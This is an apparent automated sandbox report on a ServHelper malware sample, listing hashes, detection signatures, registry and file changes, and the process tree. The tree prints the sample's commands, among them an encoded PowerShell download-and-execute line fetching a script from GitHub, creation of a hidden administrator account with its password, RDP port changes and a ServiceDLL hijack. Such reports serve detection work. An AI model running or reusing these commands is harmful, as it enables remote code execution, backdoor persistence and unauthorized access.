Analysis
- max time kernel: 60s
- max time network: 135s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 09-08-2021 04:21

Static task: static1

Behavioral task: behavioral1
- Sample: 86178014e457120d9dc6f6e27453338c.exe
- Resource: win7v20210410

Behavioral task: behavioral2
- Sample: 86178014e457120d9dc6f6e27453338c.exe
- Resource: win10v20210408

General
- Target: 86178014e457120d9dc6f6e27453338c.exe
- Size: 6.0MB
- MD5: 86178014e457120d9dc6f6e27453338c
- SHA1: 16ab38c0e9c4516532f9d111523e948a6311bfc0
- SHA256: d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8
- SHA512: 746417e600a1a0cb157f6a74422140b1ed75767a7f47f208c46feadac1dcf845637ce986a11cd7ed3f07e9782ff736b8da448057b0eb65cc50df30baa500bf75
Malware Config
- Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
- suricata: ET MALWARE ServHelper CnC Inital Checkin
- suricata: ET MALWARE ServHelper CnC Inital Checkin
- Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (9 IoCs)
  Processes: powershell.exe
  flow  pid   process
  18    1308  powershell.exe
  20    1308  powershell.exe
  21    1308  powershell.exe
  22    1308  powershell.exe
  24    1308  powershell.exe
  26    1308  powershell.exe
  28    1308  powershell.exe
  30    1308  powershell.exe
  32    1308  powershell.exe
- Modifies RDP port number used by Windows (1 TTPs)
- Sets DLL path for service in the registry (2 TTPs)
- Processes:
  resource                        yara_rule
  \Windows\Branding\mediasrv.png  upx
  \Windows\Branding\mediasvc.png  upx
- Loads dropped DLL (2 IoCs)
  Processes:
  pid   process
  2144
  2144
- Drops file in Program Files directory (4 IoCs)
  Processes: powershell.exe (the process column of every row below)
  description                   ioc
  File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT
  File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI
  File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT
  File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI
- Drops file in Windows directory (19 IoCs)
  Processes: powershell.exe, powershell.exe (the process column of every row below is powershell.exe)
  description                   ioc
  File opened for modification  C:\Windows\branding\Basebrd
  File opened for modification  C:\Windows\branding\ShellBrd
  File opened for modification  C:\Windows\branding\mediasrv.png
  File opened for modification  C:\Windows\branding\mediasvc.png
  File opened for modification  C:\Windows\branding\wupsvc.jpg
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1984.tmp
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1A12.tmp
  File created                  C:\Windows\branding\mediasrv.png
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_q0muteo5.kph.psm1
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  File created                  C:\Windows\branding\wupsvc.jpg
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1A81.tmp
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1A32.tmp
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_efwzxkbu.afj.ps1
  File created                  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1A82.tmp
  File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat
  File created                  C:\Windows\branding\mediasvc.png
- Modifies data under HKEY_USERS (64 IoCs)
  Processes: powershell.exe (the process column of every row below)
  description      ioc
  Key created      \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"
  Key created      \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs
  Key created      \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33"
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3"
  Key created      \REGISTRY\USER\S-1-5-20\Software\Microsoft
  Key created      \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33"
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"
  Key created      \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople
  Key created      \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."
  Key created      \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"
  Key created      \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0"
  Key created      \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs
  Key created      \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs
  Key created      \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs
  Key created      \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"
  Key created      \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"
  Key created      \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed
  Key created      \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"
  Key created      \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
  Key created      \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer"
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"
  Key created      \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates
  Key created      \REGISTRY\USER\S-1-5-20\Software
  Key created      \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018"
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480"
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0"
  Key created      \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges
  Key created      \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA
  Key created      \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs
  Key created      \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425"
  Key created      \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1"
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3"
  Key created      \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423"
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1"
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]"
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"
- Modifies registry key (1 TTPs, 1 IoCs)
- Runs net.exe
- Script User-Agent (4 IoCs)
  Uses user-agent string associated with script host/environment.
  Processes:
  description             flow  ioc
  HTTP User-Agent header  20    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  21    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  22    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  24    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  Processes: powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe
  pid   process
  2852  powershell.exe
  2852  powershell.exe
  2852  powershell.exe
  1788  powershell.exe
  1788  powershell.exe
  1788  powershell.exe
  2220  powershell.exe
  2220  powershell.exe
  2220  powershell.exe
  1404  powershell.exe
  1404  powershell.exe
  1404  powershell.exe
  2852  powershell.exe
  2852  powershell.exe
  2852  powershell.exe
  1308  powershell.exe
  1308  powershell.exe
  1308  powershell.exe
- Suspicious behavior: LoadsDriver (2 IoCs)
  Processes:
  pid   process
  620
  620
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes: 86178014e457120d9dc6f6e27453338c.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe
  The 64 "Token:" rows grouped by pid and process, in the report's order:
  808 86178014e457120d9dc6f6e27453338c.exe (1 row): SeDebugPrivilege
  2852 powershell.exe (1 row): SeDebugPrivilege
  1788 powershell.exe (22 rows): SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  2220 powershell.exe (22 rows): SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  1404 powershell.exe (18 rows): SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: 86178014e457120d9dc6f6e27453338c.exe, powershell.exe, csc.exe, net.exe, cmd.exe, cmd.exe, net.exe, cmd.exe, cmd.exe, net.exe, cmd.exe, net.exe, cmd.exe, net.exe, cmd.exe, net.exe, cmd.exe, net.exe, cmd.exe, net.exe, cmd.exe, net.exe, cmd.exe
  Each "PID X wrote to memory of Y" row appears twice in the report; the 32 distinct pairs (pid process -> target pid target process), in the report's order:
  808 86178014e457120d9dc6f6e27453338c.exe -> 2852 powershell.exe
  2852 powershell.exe -> 1324 csc.exe
  1324 csc.exe -> 2148 cvtres.exe
  2852 powershell.exe -> 1788 powershell.exe
  2852 powershell.exe -> 2220 powershell.exe
  2852 powershell.exe -> 1404 powershell.exe
  2852 powershell.exe -> 3916 reg.exe
  2852 powershell.exe -> 3456 reg.exe
  2852 powershell.exe -> 3208 reg.exe
  2852 powershell.exe -> 1316 net.exe
  1316 net.exe -> 196 net1.exe
  2852 powershell.exe -> 912 cmd.exe
  912 cmd.exe -> 1404 cmd.exe
  1404 cmd.exe -> 3248 net.exe
  3248 net.exe -> 2256 net1.exe
  2852 powershell.exe -> 3508 cmd.exe
  3508 cmd.exe -> 3172 cmd.exe
  3172 cmd.exe -> 3368 net.exe
  3368 net.exe -> 3648 net1.exe
  616 cmd.exe -> 1748 net.exe
  1748 net.exe -> 3808 net1.exe
  500 cmd.exe -> 2512 net.exe
  2512 net.exe -> 3912 net1.exe
  2000 cmd.exe -> 2184 net.exe
  2184 net.exe -> 3476 net1.exe
  3652 cmd.exe -> 1324 net.exe
  1324 net.exe -> 2384 net1.exe
  3380 cmd.exe -> 3912 net.exe
  3912 net.exe -> 588 net1.exe
  1420 cmd.exe -> 3772 net.exe
  3772 net.exe -> 2220 net1.exe
  3808 cmd.exe -> 3204 WMIC.exe
Processes
(Each entry gives the image path, its command line, its PID and the signatures it triggered; the number in brackets is the nesting depth from the report, and indentation follows it.)

- [1] C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe"
  PID: 808
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    PID: 2852
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lhq4zxin\lhq4zxin.cmdline"
      PID: 1324
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBE45.tmp" "c:\Users\Admin\AppData\Local\Temp\lhq4zxin\CSC1FC88830663E45AF842C8B7F5220DB23.TMP"
        PID: 2148
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      PID: 1788
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      PID: 2220
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      PID: 1404
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
      PID: 3916
    - [3] C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      PID: 3456
      - Modifies registry key
    - [3] C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
      PID: 3208
    - [3] C:\Windows\system32\net.exe
      Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      PID: 1316
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        PID: 196
    - [3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      PID: 912
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\cmd.exe
        Command line: cmd /c net start rdpdr
        PID: 1404
        - Suspicious use of WriteProcessMemory
        - [5] C:\Windows\system32\net.exe
          Command line: net start rdpdr
          PID: 3248
          - Suspicious use of WriteProcessMemory
          - [6] C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 start rdpdr
            PID: 2256
    - [3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      PID: 3508
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\cmd.exe
        Command line: cmd /c net start TermService
        PID: 3172
        - Suspicious use of WriteProcessMemory
        - [5] C:\Windows\system32\net.exe
          Command line: net start TermService
          PID: 3368
          - Suspicious use of WriteProcessMemory
          - [6] C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 start TermService
            PID: 3648
    - [3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
      PID: 3916
    - [3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
      PID: 2960
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user WgaUtilAcc 000000 /del
  PID: 616
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe user WgaUtilAcc 000000 /del
    PID: 1748
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
      PID: 3808
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user WgaUtilAcc H9MWIhec /add
  PID: 500
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe user WgaUtilAcc H9MWIhec /add
    PID: 2512
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user WgaUtilAcc H9MWIhec /add
      PID: 3912
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  PID: 2000
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    PID: 2184
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
      PID: 3476
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
  PID: 3652
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
    PID: 1324
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
      PID: 2384
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  PID: 3380
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    PID: 3912
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
      PID: 588
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user WgaUtilAcc H9MWIhec
  PID: 1420
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe user WgaUtilAcc H9MWIhec
    PID: 3772
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user WgaUtilAcc H9MWIhec
      PID: 2220
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic path win32_VideoController get name
  PID: 3808
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic path win32_VideoController get name
    PID: 3204
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic CPU get NAME
  PID: 3912
  - [2] C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic CPU get NAME
    PID: 3920
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  PID: 3476
  - [2] C:\Windows\system32\cmd.exe
    Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    PID: 196
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      PID: 1308
      - Blocklisted process makes network request
      - Drops file in Program Files directory
      - Drops file in Windows directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v6
Downloads